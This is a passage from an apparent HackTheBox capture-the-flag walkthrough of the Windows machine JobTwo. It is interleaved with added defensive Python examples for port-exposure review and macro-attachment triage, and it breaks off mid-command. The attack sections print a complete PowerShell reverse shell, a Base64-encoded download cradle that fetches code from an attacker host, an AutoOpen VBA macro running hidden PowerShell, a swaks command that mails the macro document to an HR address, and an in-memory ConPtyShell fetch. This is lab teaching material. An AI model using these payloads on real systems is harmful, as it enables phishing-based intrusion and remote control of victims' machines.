HackTheBox: JobTwo Walkthrough
Original title: HackTheBox: JobTwo Writeup
Analysis results
- Category
- AI
- Importance
- 65
- Trend score
- 27
- Summary
- This article walks through the HackTheBox machine JobTwo. Through concrete steps and technical details it shows how the machine is compromised and covers the tools and techniques involved. It closes with the strategy and reasoning needed to finish the challenge, serving as a reference for other users attempting similar challenges.
- Keywords
## Executive Summary

JobTwo is a Windows Server 2022 machine that simulates a realistic corporate phishing and privilege escalation scenario. The attack chain begins with a job posting website that solicits Word document CVs via email. By crafting a macro-embedded .docm file and sending it to the HR email address, we obtain an initial foothold as user `julian`. From there, we discover hMailServer installed on the box, extract and crack a password hash from its database to pivot to user `ferdinand` (user flag). Finally, we exploit CVE-2023-27532 - an unauthenticated credential leak and RCE vulnerability in Veeam Backup & Replication - to execute commands as NT AUTHORITY\SYSTEM and retrieve the root flag.

## Table of Contents

1. Reconnaissance
2. Web Enumeration
3. Initial Access - VBA Macro Phishing
4. Stable Shell with ConPtyShell
5. Post-Exploitation as Julian
6. Credential Extraction - hMailServer
7. Lateral Movement to Ferdinand (User Flag)
8. Privilege Escalation - CVE-2023-27532 (Veeam)
9. Root Flag
10. Attack Chain Summary
11. Key Vulnerabilities

## 1. Reconnaissance

We start with a full Nmap scan using `-A` (aggressive mode: OS detection, version detection, script scanning, traceroute) and `-Pn` (skip host discovery, since ICMP may be blocked):

```
root@kali:/home/kali/htb/Job2# nmap -A -Pn <TARGET_IP>
Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-25 07:56 -0400
Nmap scan report for <TARGET_IP>
Host is up (0.28s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT      STATE SERVICE               VERSION
22/tcp    open  ssh                   OpenSSH for_Windows_9.5 (protocol 2.0)
25/tcp    open  smtp                  hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http                  Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp   open  rpcbind
135/tcp   open  msrpc                 Microsoft Windows RPC
139/tcp   open  netbios-ssn           Microsoft Windows netbios-ssn
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
445/tcp   open  microsoft-ds?
2049/tcp  open  rpcbind
3389/tcp  open  ms-wbt-server         Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: JOB2
|   NetBIOS_Domain_Name: JOB2
|   NetBIOS_Computer_Name: JOB2
|   DNS_Domain_Name: JOB2
|   DNS_Computer_Name: JOB2
|   Product_Version: 10.0.20348
|_  System_Time: 2026-06-25T12:57:42+00:00
5985/tcp  open  http                  Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
10001/tcp open  msexchange-logcopier  Microsoft Exchange 2010 log copier
10002/tcp open  msexchange-logcopier  Microsoft Exchange 2010 log copier
10003/tcp open  storagecraft-image    StorageCraft Image Manager
```

Key observations:

- Port 25 (SMTP) - hMailServer is running, meaning we can send emails directly to the box.
- Port 80/443 - a web server is present.
- Port 5985 - WinRM is open, useful for lateral movement if we get credentials.
- Port 3389 - RDP is open.
- OS fingerprinting suggests Windows Server 2022.

We add the hostname to /etc/hosts so domain-based virtual hosting resolves correctly:

```
echo '<TARGET_IP> job2.vl www.job2.vl' >> /etc/hosts
```

We then check for anonymous/guest SMB access. Both attempts fail - null sessions and the guest account are disabled:

```
root@kali:/home/kali/htb/Job2# nxc smb <TARGET_IP> -u '' -p ''
SMB  <TARGET_IP>  445  JOB2  [*] Windows Server 2022 Build 20348 x64 (name:JOB2) (domain:JOB2) (signing:False) (SMBv1:None)
SMB  <TARGET_IP>  445  JOB2  [-] JOB2\: STATUS_ACCESS_DENIED
root@kali:/home/kali/htb/Job2# nxc smb <TARGET_IP> -u 'guest' -p ''
SMB  <TARGET_IP>  445  JOB2  [*] Windows Server 2022 Build 20348 x64 (name:JOB2) (domain:JOB2) (signing:False) (SMBv1:None)
SMB  <TARGET_IP>  445  JOB2  [-] JOB2\guest: STATUS_ACCOUNT_DISABLED
```

SMB is a dead end for now. We pivot to the web server.

## 2. Web Enumeration

Browsing to http://www.job2.vl reveals a boat rental company job posting page.
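Added example, not code from the writeup: the same port table read the way a defender reviewing their own perimeter would read it. The Python below parses Nmap's normal-output port lines (skipping the `|` NSE script lines) and applies an exposure policy to the open ports. The policy dictionary is an assumption standing in for an organisation's own baseline, and the sample text is constructed from the scan output above with the script lines removed.

```python
import re

# Constructed sample: the port lines from the scan above, NSE script output removed.
NMAP_OUTPUT = """\
Not shown: 985 filtered tcp ports (no-response)
PORT      STATE SERVICE               VERSION
22/tcp    open  ssh                   OpenSSH for_Windows_9.5 (protocol 2.0)
25/tcp    open  smtp                  hMailServer smtpd
80/tcp    open  http                  Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp   open  rpcbind
135/tcp   open  msrpc                 Microsoft Windows RPC
139/tcp   open  netbios-ssn           Microsoft Windows netbios-ssn
443/tcp   open  ssl/https?
445/tcp   open  microsoft-ds?
2049/tcp  open  rpcbind
3389/tcp  open  ms-wbt-server         Microsoft Terminal Services
5985/tcp  open  http                  Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
10001/tcp open  msexchange-logcopier  Microsoft Exchange 2010 log copier
10002/tcp open  msexchange-logcopier  Microsoft Exchange 2010 log copier
10003/tcp open  storagecraft-image    StorageCraft Image Manager
"""

# One Nmap port line: "<port>/<proto>  <state>  <service>  [<version ...>]".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

# Assumed reviewer policy for an internet-facing host: services that should not be
# reachable from untrusted networks, with the reason that matters on this box.
EXPOSURE_POLICY = {
    25: "SMTP reachable from anywhere: inbound mail is an unauthenticated file-delivery channel",
    111: "rpcbind exposed",
    135: "MS-RPC endpoint mapper exposed",
    139: "NetBIOS session service exposed",
    445: "SMB exposed",
    2049: "NFS exposed",
    3389: "RDP exposed: password-spraying and credential-reuse target",
    5985: "WinRM exposed: remote PowerShell for anyone holding a valid credential",
}


def parse_nmap(text: str) -> list:
    """Return one dict per port line; header, summary and '|' script lines are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        service = m.group("service")
        ports.append({
            "port": int(m.group("port")),
            "proto": m.group("proto"),
            "state": m.group("state"),
            # Nmap appends '?' when the service was not confirmed by a probe match.
            "service": service.rstrip("?"),
            "service_guessed": service.endswith("?"),
            "version": m.group("version").strip(),
        })
    return ports


def review_exposure(ports: list) -> list:
    """Open ports that violate EXPOSURE_POLICY, as human-readable findings."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        reason = EXPOSURE_POLICY.get(p["port"])
        if reason:
            findings.append(f"{p['port']}/{p['proto']} {p['service']}: {reason}")
    return findings


if __name__ == "__main__":
    for finding in review_exposure(parse_nmap(NMAP_OUTPUT)):
        print(finding)
```

Run against a real scan by piping `nmap -oN -` output into `parse_nmap`; the `service_guessed` flag is worth keeping, since an unconfirmed `ssl/https?` or `microsoft-ds?` is exactly where a manual check should follow.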
The relevant section reads: "If you are interested in this position, please send your CV to [email protected] as a Microsoft Word Document."

This is the entry point. The site is explicitly asking for a Word document attachment, a classic phishing vector. The target email is [email protected] and SMTP (port 25) is directly accessible, so we can send mail without needing any authentication bypass.

## 3. Initial Access - VBA Macro Phishing

### How it works

Microsoft Word supports Visual Basic for Applications (VBA) macros embedded inside .docm files. When a victim opens the document and enables macros, the AutoOpen subroutine fires automatically. We abuse this to execute a PowerShell reverse shell payload on the target machine without any user interaction beyond opening the file.

### Step 1 - Create the PowerShell reverse shell

We grab a PowerShell reverse shell from revshells.com - specifically the PowerShell #1 option - plugging in our attacker IP and port 4444, then save it as shell.ps1. The payload opens a TCP connection back to our machine, reads commands we send, executes them, and returns the output:

```
cat shell.ps1
$LHOST = "<YOUR_IP>"
$LPORT = 4444
$TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT)
$NetworkStream = $TCPClient.GetStream()
$StreamReader = New-Object IO.StreamReader($NetworkStream)
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
$StreamWriter.AutoFlush = $true
$Buffer = New-Object System.Byte[] 1024
while ($TCPClient.Connected) {
    while ($NetworkStream.DataAvailable) {
        $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length)
        $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData - 1)
    }
    if ($TCPClient.Connected -and $Code.Length -gt 1) {
        $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }
        $StreamWriter.Write("$Output`n")
        $Code = $null
    }
}
$TCPClient.Close()
$NetworkStream.Close()
$StreamReader.Close()
$StreamWriter.Close()
```

### Step 2 - Base64-encode a download cradle

Instead of embedding the full shell script inside the macro (which could trigger AV signatures), we use a download cradle: the macro tells PowerShell to fetch shell.ps1 from our HTTP server and execute it in memory. We encode the cradle in UTF-16LE Base64 (the format PowerShell's `-EncodedCommand` flag expects):

```
cmd='IEX(New-Object Net.WebClient).DownloadString("http://<YOUR_IP>/shell.ps1")'
echo -n "$cmd" | iconv -t UTF-16LE | base64 -w0
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADwAWQBPAFUAUgBfAEkAUAA+AC8AcwBoAGUAbABsAC4AcABzADEAIgApAA==
```

Replace `<YOUR_IP>` with your own attacker IP and re-run the encoding to get your own base64 string.

### Step 3 - Create the malicious Word document

This step requires a Windows machine with Microsoft Word. Microsoft 365 or an activated Word license is required to save and embed macros; if unavailable, a Windows VM with a trial/activated copy works fine. The VBA project name in the editor matches the .docm filename, so because we save as evil.docm, the project shows as Project (evil) in the VBA editor.

1. Open Word, create a new document, and save it as evil.docm (macro-enabled Word document format).
2. Go to View → Macros, type AutoOpen in the macro name box, and click Create.
3. In the VBA editor, right-click Project (evil) in the left pane → Insert → Module.
4. Paste the following macro into the module. AutoOpen fires when macros are enabled on open; Document_Open is a fallback for some Word versions:

```
Sub AutoOpen()
    Shell "powershell -nop -w hidden -ep bypass -e <YOUR_BASE64_HERE>", vbHide
End Sub

Sub Document_Open()
    AutoOpen
End Sub
```

5. Save the document again as evil.docm.
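Added example, not code from the writeup: the check a mail gateway or analyst would apply to a CV attachment arriving at an HR mailbox, covering both the encoding trick in Step 2 and the auto-exec wiring in Step 3. It flags a `word/vbaProject.bin` part inside the zip regardless of file extension or declared content type, looks for the auto-exec procedure names, extracts any `-e`/`-EncodedCommand` argument and reverses the UTF-16LE Base64 layer so the download cradle is visible in clear. Caveat built into the code: real module streams are MS-OVBA compressed, so the raw-byte scan is a first pass and `olevba` (oletools) should do the full decompression. The sample document is constructed in memory with plain-text macro source; `AUTO_EXEC`, `CRADLE_MARKERS` and the `verdict` policy are this example's assumptions.

```python
"""Triage a Word attachment: macro container? auto-exec entry point? encoded PowerShell?"""
import base64
import io
import re
import zipfile

# Procedure names Word runs on its own once macros are enabled (assumed watch-list).
AUTO_EXEC = ("AutoOpen", "Document_Open", "AutoExec", "AutoClose", "Document_Close")

# Download-cradle fragments to look for in decoded PowerShell (assumed watch-list).
CRADLE_MARKERS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
                  "Net.WebClient", "Invoke-WebRequest", "FromBase64String")

# "-e", "-ec", "-en", "-enc" or "-encodedcommand" followed by a Base64 argument.
ENCODED_ARG = re.compile(rb"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Content type Word declares for the main part of a macro-enabled (.docm) document.
MACRO_ENABLED_CT = b"application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_DOCX_CT = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"


def decode_encoded_command(b64: str):
    """PowerShell's -EncodedCommand is Base64 over UTF-16LE text; undo both layers."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_word_attachment(data: bytes) -> dict:
    """Inspect the OOXML zip; the zip contents decide, not the extension."""
    result = {"macro_container": False, "declared_macro_enabled": False,
              "auto_exec": [], "encoded_commands": [], "cradle_markers": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if "[Content_Types].xml" in names:
            result["declared_macro_enabled"] = MACRO_ENABLED_CT in zf.read("[Content_Types].xml")
        if "word/vbaProject.bin" not in names:
            return result
        result["macro_container"] = True
        blob = zf.read("word/vbaProject.bin")
    # Raw-byte scan: real module streams are MS-OVBA compressed, so only fragments
    # that survive compression are visible here. Use olevba for full decompression.
    lowered = blob.lower()
    result["auto_exec"] = [n for n in AUTO_EXEC if n.lower().encode() in lowered]
    for m in ENCODED_ARG.finditer(blob):
        decoded = decode_encoded_command(m.group(1).decode("ascii"))
        if decoded is None:
            continue
        result["encoded_commands"].append(decoded)
        for marker in CRADLE_MARKERS:
            if marker.lower() in decoded.lower() and marker not in result["cradle_markers"]:
                result["cradle_markers"].append(marker)
    return result


def verdict(result: dict) -> str:
    """Assumed gateway policy: block on macro + trigger/encoded command, else quarantine macros."""
    if result["macro_container"] and (result["auto_exec"] or result["encoded_commands"]):
        return "block"
    if result["macro_container"] or result["declared_macro_enabled"]:
        return "quarantine"
    return "allow"


# --- Constructed sample so the block runs stand-alone -------------------------------
CRADLE = 'IEX(New-Object Net.WebClient).DownloadString("http://<YOUR_IP>/shell.ps1")'
# Same transformation as `iconv -t UTF-16LE | base64 -w0` in Step 2.
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_MACRO = (
    "Sub AutoOpen()\r\n"
    f'    Shell "powershell -nop -w hidden -ep bypass -e {ENCODED}", vbHide\r\n'
    "End Sub\r\n"
    "Sub Document_Open()\r\n    AutoOpen\r\nEnd Sub\r\n"
)


def build_sample(macro_source=None) -> bytes:
    """Constructed zip shaped like a Word document. Macro source is stored as plain
    text in vbaProject.bin (a real one is an OLE container); omitted when None."""
    main_ct = MACRO_ENABLED_CT.decode() if macro_source else PLAIN_DOCX_CT
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    f'<Types><Override PartName="/word/document.xml" ContentType="{main_ct}"/></Types>')
        zf.writestr("word/document.xml", "<w:document/>")
        if macro_source:
            zf.writestr("word/vbaProject.bin", macro_source.encode("latin-1"))
    return buf.getvalue()


if __name__ == "__main__":
    report = triage_word_attachment(build_sample(SAMPLE_MACRO))
    print(verdict(report), report)
```

`decode_encoded_command` is also the right tool for a process-creation event that shows `powershell ... -e <blob>`: feed it the argument and the cradle, with its download host, comes back in clear. The same Base64 string the writeup prints in Step 2 decodes to `CRADLE` above.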
### Step 4 - Host the payload and set up the listener

On our attacker machine, we serve shell.ps1 over HTTP and start a Netcat listener:

```
python3 -m http.server 80
rlwrap -cAr nc -lnvp 4444
```

(`rlwrap` adds readline support for arrow keys and history in the shell.)

### Step 5 - Send the phishing email

We use swaks (Swiss Army Knife for SMTP) to send the malicious document directly to [email protected] via the open SMTP server on port 25. No authentication is required:

```
swaks \
  --to [email protected] \
  --from [email protected] \
  --header 'Subject: Job Application' \
  --body "Please review my resume" \
  --attach @evil.docm \
  --server <TARGET_IP>
=== Trying <TARGET_IP>:25...
=== Connected to <TARGET_IP>.
<-  220 JOB2 ESMTP
 -> EHLO kali
<-  250-JOB2
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> MAIL FROM:<[email protected]>
<-  250 OK
 -> RCPT TO:<[email protected]>
<-  250 OK
 -> DATA
<-  354 OK, send.
[... base64 encoded attachment ...]
<** 250 Queued (35.408 seconds)
=== Connection closed with remote host.
```

Note on timeouts: the connection may show a timeout waiting for the server response, but as long as the email is queued (`250 Queued`), the payload will execute. The server-side mail processor opens the document automatically.

Shortly after sending, our HTTP server receives a request for shell.ps1, and our listener catches the callback:

```
<TARGET_IP> - - [26/Jun/2026 06:38:56] "GET /shell.ps1 HTTP/1.1" 200 -
```

```
rlwrap -cAr nc -lnvp 4444
listening on [any] 4444 ...
connect to [<YOUR_IP>] from (UNKNOWN) [<TARGET_IP>] 57097
hostname
JOB2
```

We have a shell as `job2\julian`.

## 4. Stable Shell with ConPtyShell

The initial Netcat shell is limited - no tab completion, no arrow keys, and commands like `clear` can break it. We upgrade to a full interactive PTY shell using ConPtyShell, which uses the Windows ConPTY API to provide a proper terminal experience.
Clone the tool and host it:

```
git clone https://github.com/antonioCoco/ConPtyShell.git
cd ConPtyShell
python3 -m http.server 8000
```

On the target, download and invoke the script, pointing it at our new listener on port 4445:

```
IEX(iwr http://<YOUR_IP>:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing)
Invoke-ConPtyShell <YOUR_IP> 4445
```

Start the ConPtyShell listener on our end:

```
stty raw -echo; (stty size; cat) | nc -lvnp 4445
liste
```